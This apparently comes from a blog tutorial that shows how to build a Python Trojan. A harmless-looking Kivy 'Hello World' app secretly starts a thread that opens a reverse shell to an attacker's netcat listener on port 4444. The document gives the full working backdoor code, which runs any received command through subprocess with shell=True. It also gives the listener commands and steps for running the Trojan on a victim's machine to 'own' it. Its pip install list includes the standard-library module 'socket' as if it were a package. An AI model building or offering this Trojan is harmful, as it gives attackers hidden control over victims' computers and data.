Enumeration
Requirements
To get started, let’s install the required libraries:
1
2
3
pip install kivy
pip install socket
pip install threaded
The Trojan
How to build?
The Backdoor
Among the many things we can embed in a Trojan Horse, I choose to embed a Backdoor.
- Basically, you can embed everything, but today we’ll embed a backdoor.
The App
This is a key point, we will use the Kivy framework in order to develop an Innocent-looking app, but as the Trojan attack says, it will contain the malicious backdoor, which we’ll use to gain access to the computer. From then, you’ll own the target’s computer.
- Disclaimer : I am not a graphical apps experienced developer, just use them when I need. So the Trojan we’ll build has not a good graphics, however, you’ll be able to imporove it on your own with the Kivy’s documentation.
As said in the disclaimer, today we won’t focus on the graphic of the App, that can be easily improved just by going to Kivy’s Documentation, rather, we’ll focus on how to embed everything you want(here a Backdoor) in a graphical app.
The Hacker’s Machine
we’ll just need to use Netcat and waitting for the response.open a Terminal Window and:
1
nc -lnv 4444
Start Coding
Now it Is the moment to code our Trojan. Basically, we’ll organize using a function(a malicious one), and a class(the GUI). Such a simple code.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from kivy.app import App
from kivy.uix.label import Label
import threading
import socket
import subprocess
def main():
server_ip = 'your_local_ip'
port = 4444
backdoor = socket.socket()
backdoor.connect((server_ip, port))
while True:
command = backdoor.recv(1024)
command = command.decode()
op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = op.stdout.read()
output_error = op.stderr.read()
backdoor.send(output + output_error)
class App(App):
def build(self):
return Label(text="Hello World")
mal_thread = threading.Thread(target=main)
mal_thread.start()
app = App()
app.run()
Lines 1/2
: Imported some Kivy basic modules.Lines 4/6: Imported the Socket and Subprocess module for the backdoor. Then the threading module in order to be able to execute both the malicious code and neutral(the GUI code).
Lines 9/22
: Used the code of the Backdoor Attack in Python article to create a main function that contains the backdoor.Lines 26/27
: Build a“Hello World”
simple GUI.Lines 31/32
: Created a thread for themain()
function and then started it(mal_thread.start())
.Lines 35/36
: Ran the simple GUI.
On the Attacker Machine
As shown previously, we will be using Netcat to bind a port and listen for incoming connections. In this case, we will use the well known 4444 port. This command will give you no output until the Victim connects.
1
nc -lvp 4444
On the Target Machine
After having started the attack on the Attacker’s Machine, we can complete it on the victim machine.
Just export the code to the target machine and execute it, in order for the backdoor to work make sure you entered the right IP address at line 10.
Once you execute the code on the Victim computer, you’ll see a Kivy app saying “hello world” on the victim’s, and you’ll see this on the Attacker’s side:
- So, we got a shell on the Victim computer using a Reverse Shell. Great!